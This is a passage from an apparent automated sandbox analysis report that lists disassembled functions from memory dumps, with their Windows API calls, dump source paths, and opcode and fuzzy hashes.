                                                                                            • Instruction Fuzzy Hash: 981191715093849FDB128F25DC55B96FFA4EF06220F0984EEED498B292D375A808CB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 025F05E8, Relevance: 1.6, APIs: 1, Instructions: 54fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • UnmapViewOfFile.KERNELBASE(?), ref: 025F0640
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2131982580.00000000025F0000.00000040.00000001.sdmp, Offset: 025F0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: FileUnmapView
                                                                                            • String ID:
                                                                                            • API String ID: 2564024751-0
                                                                                            • Opcode ID: f632df569a65042d254d8d4312e507d215df7fd13252c0ae62367823e6f0e395
                                                                                            • Instruction ID: 4cf626b8ab306d8b1c0eadbad2f40e2d00d6b0f24c045e1d0bd4f728e5f612bc
                                                                                            • Opcode Fuzzy Hash: f632df569a65042d254d8d4312e507d215df7fd13252c0ae62367823e6f0e395
                                                                                            • Instruction Fuzzy Hash: D011C2755093C09FDB128B15DC95B52FFB4EF47220F0880EBED858B6A3D265A908CB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01D0AAD2, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 01D0AB1A
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2125276460.0000000001D0A000.00000040.00000001.sdmp, Offset: 01D0A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: LookupPrivilegeValue
                                                                                            • String ID:
                                                                                            • API String ID: 3899507212-0
                                                                                            • Opcode ID: a6c4669c9047f5ed6430d895381a424eb2b3781fd30230c59eef1327db3975d6
                                                                                            • Instruction ID: 153433fb6706cf91f8797e2dcb8b3198ea29b5c57f33887eec9f5e535123cc9e
                                                                                            • Opcode Fuzzy Hash: a6c4669c9047f5ed6430d895381a424eb2b3781fd30230c59eef1327db3975d6
                                                                                            • Instruction Fuzzy Hash: C711A1B26007009FEB21DF29DC85B56FBD8EF14220F08C86ADD49CB282D670E404CA71
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01D0AA0F, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetConsoleOutputCP.KERNEL32 ref: 01D0AA71
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2125276460.0000000001D0A000.00000040.00000001.sdmp, Offset: 01D0A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: ConsoleOutput
                                                                                            • String ID:
                                                                                            • API String ID: 3985236979-0
                                                                                            • Opcode ID: 7b33945f9961171034de0aa36897fd449130e5db680a3b09019d777f0213b398
                                                                                            • Instruction ID: 65f9698210453267d3ddee2b84b6809cdd865abc61b3b1f8ee5cc9f99657a91e
                                                                                            • Opcode Fuzzy Hash: 7b33945f9961171034de0aa36897fd449130e5db680a3b09019d777f0213b398
                                                                                            • Instruction Fuzzy Hash: 9B11917540D7C09FD7138B15DC85B92BFA4EF07224F0980DBDD858F1A3D269A909D762
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 025F092F, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetSystemInfo.KERNELBASE(?), ref: 025F099C
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2131982580.00000000025F0000.00000040.00000001.sdmp, Offset: 025F0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InfoSystem
                                                                                            • String ID:
                                                                                            • API String ID: 31276548-0
                                                                                            • Opcode ID: 15640f4a6917daab92bfeb756fccbe6f8abf33dcc6b300fdd46b15eb483337bb
                                                                                            • Instruction ID: f13cc04f581bbdefee3514b574d6a4222823fe1d2cc76007070ec87a0237a962
                                                                                            • Opcode Fuzzy Hash: 15640f4a6917daab92bfeb756fccbe6f8abf33dcc6b300fdd46b15eb483337bb
                                                                                            • Instruction Fuzzy Hash: F4119D715093C09FE7228B25DC55B92BFA4EF07324F09C0DADD844B2A3D265A908CB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 025F07C6, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetFileType.KERNELBASE(?,00000E9C,F80F2F2B,00000000,00000000,00000000,00000000), ref: 025F0819
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2131982580.00000000025F0000.00000040.00000001.sdmp, Offset: 025F0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: FileType
                                                                                            • String ID:
                                                                                            • API String ID: 3081899298-0
                                                                                            • Opcode ID: 904a0c9a53915a90fdd26769e1a16a0b73e268218c59929480cb32a055ed2096
                                                                                            • Instruction ID: 99d2d66a608a6d69f1478e28b82f61ed615bcdd61a805e10d4f9943e781276fc
                                                                                            • Opcode Fuzzy Hash: 904a0c9a53915a90fdd26769e1a16a0b73e268218c59929480cb32a055ed2096
                                                                                            • Instruction Fuzzy Hash: 3B01D275500304EFFB60DF05DC85FA6FB98EF04720F18C4A6EE099B286D674A904CAB6
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 025F13AA, Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2131982580.00000000025F0000.00000040.00000001.sdmp, Offset: 025F0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: ConsoleWrite
                                                                                            • String ID:
                                                                                            • API String ID: 2657657451-0
                                                                                            • Opcode ID: 1cdbf3977059e62e13a77933cf22e6745878a5382b754a3a0ab2ddee2e59c8d9
                                                                                            • Instruction ID: 396ca0cfda330ea18baaedd11bc73c152e0051dde5088ffac070ef0f2ef2f3c4
                                                                                            • Opcode Fuzzy Hash: 1cdbf3977059e62e13a77933cf22e6745878a5382b754a3a0ab2ddee2e59c8d9
                                                                                            • Instruction Fuzzy Hash: 1A118B76510B40DFEB60DF56DC85B66FBA4EF04220F08C8AAEE498B652D371E408DB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01D0AB75, Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetLogicalDrives.KERNELBASE ref: 01D0ABC9
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2125276460.0000000001D0A000.00000040.00000001.sdmp, Offset: 01D0A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: DrivesLogical
                                                                                            • String ID:
                                                                                            • API String ID: 999431828-0
                                                                                            • Opcode ID: 3cbf2ccf716b12432ecf3b891b036adfa2b1938fd5de8ef826595a51f74dbda9
                                                                                            • Instruction ID: a64c4e1e5e96355c05dba6a326f983f1fa02b70186f53d29d1c4ad57cc5ee540
                                                                                            • Opcode Fuzzy Hash: 3cbf2ccf716b12432ecf3b891b036adfa2b1938fd5de8ef826595a51f74dbda9
                                                                                            • Instruction Fuzzy Hash: DF11C2B54097809FDB12CF15DC85B82BFA4EF02220F0980ABDD488F153D274A508CB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01D0BA32, Relevance: 1.5, APIs: 1, Instructions: 49fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 01D0BA7E
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2125276460.0000000001D0A000.00000040.00000001.sdmp, Offset: 01D0A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: CreateFile
                                                                                            • String ID:
                                                                                            • API String ID: 823142352-0
                                                                                            • Opcode ID: fae80908e2a66983f0604b0fd503a411e7fc1883c16a472b80b53b12258f5cf0
                                                                                            • Instruction ID: 374219bce1c9a535c9806bd93c276c6a22c8e0b0cf80861bc32903fba204c8aa
                                                                                            • Opcode Fuzzy Hash: fae80908e2a66983f0604b0fd503a411e7fc1883c16a472b80b53b12258f5cf0
                                                                                            • Instruction Fuzzy Hash: 00118E76504700DFEB22CF59DC44B52FBE4EF08211F0884AADD898A652D3B1E454DB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01D0A1EE, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • EnumWindows.USER32(?,00000E9C,?,?), ref: 01D0A23E
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2125276460.0000000001D0A000.00000040.00000001.sdmp, Offset: 01D0A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: EnumWindows
                                                                                            • String ID:
                                                                                            • API String ID: 1129996299-0
                                                                                            • Opcode ID: ed22d7f379c6a888eb579152114e761725ccea73efe31ed4bc8fccba87d2ed74
                                                                                            • Instruction ID: 4c705e1f99e91512fc54ce3b1f6c8d78646f2d8861b4a62429d153fa4301a77e
                                                                                            • Opcode Fuzzy Hash: ed22d7f379c6a888eb579152114e761725ccea73efe31ed4bc8fccba87d2ed74
                                                                                            • Instruction Fuzzy Hash: C4018471900600AFE710DF16DC86B66FBB8FB88A20F14816AED089B741D335F515CBE5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 025F104E, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 025F109E
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2131982580.00000000025F0000.00000040.00000001.sdmp, Offset: 025F0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InformationVolume
                                                                                            • String ID:
                                                                                            • API String ID: 2039140958-0
                                                                                            • Opcode ID: 84fa97434e2c6bac77e7e3828a811e3da16f00a5374cdf95fd4c1f168b081a33
                                                                                            • Instruction ID: e3902e6a645a0cbe131c5567374467cab75e4df7451ddaab2c52ba5b63f03bbf
                                                                                            • Opcode Fuzzy Hash: 84fa97434e2c6bac77e7e3828a811e3da16f00a5374cdf95fd4c1f168b081a33
                                                                                            • Instruction Fuzzy Hash: 0F017171900600AFE310DF16DC86B66FBA8FB88A20F14816AED089B741D335B515CBE5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 025F0196, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetConsoleTitleW.KERNEL32(?), ref: 025F01D0
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2131982580.00000000025F0000.00000040.00000001.sdmp, Offset: 025F0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: ConsoleTitle
                                                                                            • String ID:
                                                                                            • API String ID: 3358957663-0
                                                                                            • Opcode ID: 879a56319e71d01b713550b0d8d22200a967c87449649bb78d02a0a7d8fdfb7b
                                                                                            • Instruction ID: 784a6d44bc0b404a385edc6a0a9e9bcac4693e7d2a11175de0b4579888183041
                                                                                            • Opcode Fuzzy Hash: 879a56319e71d01b713550b0d8d22200a967c87449649bb78d02a0a7d8fdfb7b
                                                                                            • Instruction Fuzzy Hash: FF01B171600744CFEB50DF29DC85BA6FB98EF01220F48C4AADD09CB686D774E404CB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01D0BAFA, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetConsoleScreenBufferInfo.KERNEL32 ref: 01D0BB2F
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2125276460.0000000001D0A000.00000040.00000001.sdmp, Offset: 01D0A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: BufferConsoleInfoScreen
                                                                                            • String ID:
                                                                                            • API String ID: 3437242342-0
                                                                                            • Opcode ID: 4248a37d399478fdad751f909672d4dcbb003ed65a588642c5b9252995e2df34
                                                                                            • Instruction ID: 91398fbd8c7a36dbf9f25b909fd3c35093b1d736f7aa98f245d4508b1b8e4d66
                                                                                            • Opcode Fuzzy Hash: 4248a37d399478fdad751f909672d4dcbb003ed65a588642c5b9252995e2df34
                                                                                            • Instruction Fuzzy Hash: 0501DF75508640DFEB22CF19DC857A5FBA4EF05620F08C4ABDD498B296D275E804CB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 025F12FA, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetConsoleTextAttribute.KERNEL32(?,?), ref: 025F132F
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2131982580.00000000025F0000.00000040.00000001.sdmp, Offset: 025F0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: AttributeConsoleText
                                                                                            • String ID:
                                                                                            • API String ID: 646522457-0
                                                                                            • Opcode ID: c55c29a9b46ed36a36d6a97838048a3be5e8f7b3affec4f51976713d2e16d7f6
                                                                                            • Instruction ID: 3dd81c845fe9ed60533672494614584cd817f19fe9ef77c4c27a06d49fa7f4c2
                                                                                            • Opcode Fuzzy Hash: c55c29a9b46ed36a36d6a97838048a3be5e8f7b3affec4f51976713d2e16d7f6
                                                                                            • Instruction Fuzzy Hash: 7101BC71514740DFEF609F19D885BA9FBA4EF05620F48C8AADD098B686D275A404CB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01D0A8FA, Relevance: 1.5, APIs: 1, Instructions: 43threadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 01D0A94A
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2125276460.0000000001D0A000.00000040.00000001.sdmp, Offset: 01D0A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: LanguagesPreferredThread
                                                                                            • String ID:
                                                                                            • API String ID: 842807343-0
                                                                                            • Opcode ID: 42539c2bb1535b3f2777666d8904267bbcc9baa9d073adbf94be58830d5dc25d
                                                                                            • Instruction ID: 9ed44b9a5d99671f2806eabb2c1c57e3158f4592eb5b7713e04c43d9b99a3ec4
                                                                                            • Opcode Fuzzy Hash: 42539c2bb1535b3f2777666d8904267bbcc9baa9d073adbf94be58830d5dc25d
                                                                                            • Instruction Fuzzy Hash: 8A016271900601ABD310DF16DC86B26FBB4FB89B20F14816AED085B741D275F515CBE6
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 025F0F76, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetDriveTypeW.KERNELBASE(?), ref: 025F0FB0
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2131982580.00000000025F0000.00000040.00000001.sdmp, Offset: 025F0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: DriveType
                                                                                            • String ID:
                                                                                            • API String ID: 338552980-0
                                                                                            • Opcode ID: 55619c51f2cd7c9b456147be962ea0d1992bc7067b04f7f07a8947a1dff46416
                                                                                            • Instruction ID: 97a05f2504b62db031e745681936a5a9dd8c401c1394a5140d798232829a6106
                                                                                            • Opcode Fuzzy Hash: 55619c51f2cd7c9b456147be962ea0d1992bc7067b04f7f07a8947a1dff46416
                                                                                            • Instruction Fuzzy Hash: 4D017C71504340DFEB60DF15DC85B66FB94EB00620F58C4AADE098F28AD374E508CAA5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 025F04B2, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 025F0502
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2131982580.00000000025F0000.00000040.00000001.sdmp, Offset: 025F0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: FolderPath
                                                                                            • String ID:
                                                                                            • API String ID: 1514166925-0
                                                                                            • Opcode ID: 0c3b5adda90e9b69683b1915668aebb400626067a89a75cd63f11d2ba42ee834
                                                                                            • Instruction ID: 321004b69b6c49baa4a13dbb915602e1320a20636148f8ac52a2eb3391dbcd4b
                                                                                            • Opcode Fuzzy Hash: 0c3b5adda90e9b69683b1915668aebb400626067a89a75cd63f11d2ba42ee834
                                                                                            • Instruction Fuzzy Hash: 74016271900601ABD310DF16DC86B26FBB4FB89B20F14815AED085B741D275F515CBE6
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 025F060E, Relevance: 1.5, APIs: 1, Instructions: 39fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • UnmapViewOfFile.KERNELBASE(?), ref: 025F0640
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2131982580.00000000025F0000.00000040.00000001.sdmp, Offset: 025F0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: FileUnmapView
                                                                                            • String ID:
                                                                                            • API String ID: 2564024751-0
                                                                                            • Opcode ID: decdfda56dd10f7b7fa0c73e3fae94cdccd90968b741ba9af78e05936d7aaa24
                                                                                            • Instruction ID: ed4a1ec1186837807f541b795a78ea8bb3615f75127dda0ffe6847405af93fba
                                                                                            • Opcode Fuzzy Hash: decdfda56dd10f7b7fa0c73e3fae94cdccd90968b741ba9af78e05936d7aaa24
                                                                                            • Instruction Fuzzy Hash: 5801FF35604740CFEB608F19D885765FFA0EF45620F08C4AADE0A8B796D774E808CAA6
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01D0AB9A, Relevance: 1.5, APIs: 1, Instructions: 38COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetLogicalDrives.KERNELBASE ref: 01D0ABC9
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2125276460.0000000001D0A000.00000040.00000001.sdmp, Offset: 01D0A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: DrivesLogical
                                                                                            • String ID:
                                                                                            • API String ID: 999431828-0
                                                                                            • Opcode ID: 1c8f5b3bd5efcd47374a5c343b687dc4b294361e609b98366d25b91bf1767750
                                                                                            • Instruction ID: 9541f19553249b973303e480dcc79ce0b318bb06aa54daf8c435f26cad24a505
                                                                                            • Opcode Fuzzy Hash: 1c8f5b3bd5efcd47374a5c343b687dc4b294361e609b98366d25b91bf1767750
                                                                                            • Instruction Fuzzy Hash: 4A01F431404740CFEB11DF19DC85B95FBA4DF04220F48C4ABDD098F282D274E404CBA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 025F1116, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetThreadUILanguage.KERNEL32(?), ref: 025F1148
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2131982580.00000000025F0000.00000040.00000001.sdmp, Offset: 025F0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: LanguageThread
                                                                                            • String ID:
                                                                                            • API String ID: 243849632-0
                                                                                            • Opcode ID: 59e47d39bc089c6f44e81b6d017fc4c11510ed8279376b922abaef880220aae2
                                                                                            • Instruction ID: 6b7be241a17a26e27e0295d1ac0a8bd7cbcc8fbc8822004526e63c0b6b8c5e77
                                                                                            • Opcode Fuzzy Hash: 59e47d39bc089c6f44e81b6d017fc4c11510ed8279376b922abaef880220aae2
                                                                                            • Instruction Fuzzy Hash: 4EF0F934504B40DFEB60CF05D889B66FFA0EF05A21F48C4AACE084B312C379A448CAA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01D0A36A, Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetErrorMode.KERNELBASE(?), ref: 01D0A39C
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2125276460.0000000001D0A000.00000040.00000001.sdmp, Offset: 01D0A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: ErrorMode
                                                                                            • String ID:
                                                                                            • API String ID: 2340568224-0
                                                                                            • Opcode ID: 2f42850ed17fada27b0d48dc117ee4767880218605c82695e59218884ccf8844
                                                                                            • Instruction ID: b30a1f7ab25129e7d92b28825e8ca199975f7143f2d05c8b53a5367ffad23553
                                                                                            • Opcode Fuzzy Hash: 2f42850ed17fada27b0d48dc117ee4767880218605c82695e59218884ccf8844
                                                                                            • Instruction Fuzzy Hash: FBF0AF35504740DFEB229F49D885765FBA0EF05621F48C0AADD494B392D3B5E408CAA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 025F096A, Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetSystemInfo.KERNELBASE(?), ref: 025F099C
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2131982580.00000000025F0000.00000040.00000001.sdmp, Offset: 025F0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InfoSystem
                                                                                            • String ID:
                                                                                            • API String ID: 31276548-0
                                                                                            • Opcode ID: 7eb8efe5cfd5da310f8e80972f8e56590402342f62af26388408956494fb45dd
                                                                                            • Instruction ID: edf4f9d72fa06a60ec66b0d3a954cda271f1dcbf5e85c5f7325cd8d2e1c72bfd
                                                                                            • Opcode Fuzzy Hash: 7eb8efe5cfd5da310f8e80972f8e56590402342f62af26388408956494fb45dd
                                                                                            • Instruction Fuzzy Hash: AAF0FF34504340CFEB209F05D984725FFA0EF04220F08C0AACE480B38AE374A408CAA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01D0AA42, Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetConsoleOutputCP.KERNEL32 ref: 01D0AA71
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2125276460.0000000001D0A000.00000040.00000001.sdmp, Offset: 01D0A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: ConsoleOutput
                                                                                            • String ID:
                                                                                            • API String ID: 3985236979-0
                                                                                            • Opcode ID: 13b2a4159672c48e7141561bf3806c8ad6fac10eb376c6f424ec7ea59b318f32
                                                                                            • Instruction ID: 8b9e69e1c3de6789adca55d78089228ec6a9e0a05229ae4f4600616c1a329415
                                                                                            • Opcode Fuzzy Hash: 13b2a4159672c48e7141561bf3806c8ad6fac10eb376c6f424ec7ea59b318f32
                                                                                            • Instruction Fuzzy Hash: A0F0F631504740CFEB12DF09D985762FB90DF05621F48C0AADD494F3C2D2B4E548CBA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01D0A974, Relevance: 1.3, APIs: 1, Instructions: 54COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CloseHandle.KERNELBASE(?), ref: 01D0A9C8
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2125276460.0000000001D0A000.00000040.00000001.sdmp, Offset: 01D0A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: CloseHandle
                                                                                            • String ID:
                                                                                            • API String ID: 2962429428-0
                                                                                            • Opcode ID: 0e570ad0959e3bf73b2b3154cfa272287bcea3687fdb94b0f9970858c0aa0f0f
                                                                                            • Instruction ID: 4599c3e700b14184d03b91388f3185a875c54516b6439f14d1c81c4e9d8a282d
                                                                                            • Opcode Fuzzy Hash: 0e570ad0959e3bf73b2b3154cfa272287bcea3687fdb94b0f9970858c0aa0f0f
                                                                                            • Instruction Fuzzy Hash: C611A3715093C09FD712CF25DC55B96FFA4DF06220F0984EBED458B293D275A848CB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01D0A996, Relevance: 1.3, APIs: 1, Instructions: 43COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CloseHandle.KERNELBASE(?), ref: 01D0A9C8
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2125276460.0000000001D0A000.00000040.00000001.sdmp, Offset: 01D0A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: CloseHandle
                                                                                            • String ID:
                                                                                            • API String ID: 2962429428-0
                                                                                            • Opcode ID: 1df942eac495051c575b79ff7493ab74df3f966521f48f352ea6526d52df188b
                                                                                            • Instruction ID: 63283e8983c4dbbfc924cc5ba445bcc67aa0d5d70c6327b4073374e9b60d5a24
                                                                                            • Opcode Fuzzy Hash: 1df942eac495051c575b79ff7493ab74df3f966521f48f352ea6526d52df188b
                                                                                            • Instruction Fuzzy Hash: 7501DF75604740CFEB11DF19D8857A6FB94DF04320F48C4AADC098B282D275E844CB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 029607F7, Relevance: .0, Instructions: 47COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2133068432.0000000002960000.00000040.00000040.sdmp, Offset: 02960000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 99186dc78eff831f77623269df6b1b883869976a7b078ca7a5b759adea91fbf5
                                                                                            • Instruction ID: face827a2e5dc811de3db30cf1db7032456f899ae0c7c7bcc508100198f9df5b
                                                                                            • Opcode Fuzzy Hash: 99186dc78eff831f77623269df6b1b883869976a7b078ca7a5b759adea91fbf5
                                                                                            • Instruction Fuzzy Hash: 5501DB72509380AFD7128F15EC508A3FFB8EE87620749C0EBEC498B612D2256908CB71
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02AA0861, Relevance: .0, Instructions: 29COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2133334318.0000000002AA0000.00000040.00000001.sdmp, Offset: 02AA0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 17909ad7043385280eba697c8fd41e3aa9a20f5cb51f113accc228afd56b5ad4
                                                                                            • Instruction ID: a4a7473865cc53b58578934145f1364f9076becf125a3c49f6b76424552218af
                                                                                            • Opcode Fuzzy Hash: 17909ad7043385280eba697c8fd41e3aa9a20f5cb51f113accc228afd56b5ad4
                                                                                            • Instruction Fuzzy Hash: 47F0ED2124E7E01FC31393789C75956BFB69D8721431E41DBD1C1CF1A7DA585C45D3A2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0296081E, Relevance: .0, Instructions: 27COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2133068432.0000000002960000.00000040.00000040.sdmp, Offset: 02960000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: e3e023d7ceb99a65b586cb47b00a02bbd34dd6769d16641bcdce74524770bf5e
                                                                                            • Instruction ID: 4fc941e40f77ec77b21c77affb4f6fd2e3cbb1cf1c5509803ba714b2e52d878a
                                                                                            • Opcode Fuzzy Hash: e3e023d7ceb99a65b586cb47b00a02bbd34dd6769d16641bcdce74524770bf5e
                                                                                            • Instruction Fuzzy Hash: 83E092766047008BDB50DF0AEC41452F794EB84A30B58C47FDC0D8B700D235B508CAA1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01D023F4, Relevance: .0, Instructions: 15COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2125261916.0000000001D02000.00000040.00000001.sdmp, Offset: 01D02000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 312acb63799ea7d46ef8686c54dbad9c7960031b086be9f7d1070e0046406a49
                                                                                            • Instruction ID: cb7b82b6485ba066fea94e4e304361e55e95c853ea08c874d206cf56f0103c0e
                                                                                            • Opcode Fuzzy Hash: 312acb63799ea7d46ef8686c54dbad9c7960031b086be9f7d1070e0046406a49
                                                                                            • Instruction Fuzzy Hash: 6CD05E79206A818FE7178A1CC1A9B953BA4AF69B04F4744F9E840CB6A3C768E581D200
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01D023BC, Relevance: .0, Instructions: 14COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2125261916.0000000001D02000.00000040.00000001.sdmp, Offset: 01D02000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 11c7749fea046450e99cd3c37502e8e8ee3b2778dbcb0bb9ac7b045b0b673433
                                                                                            • Instruction ID: c4909107b4481ad85e9de3fad9675044024ddf25576ed82ac3a5ea0d7b6f4677
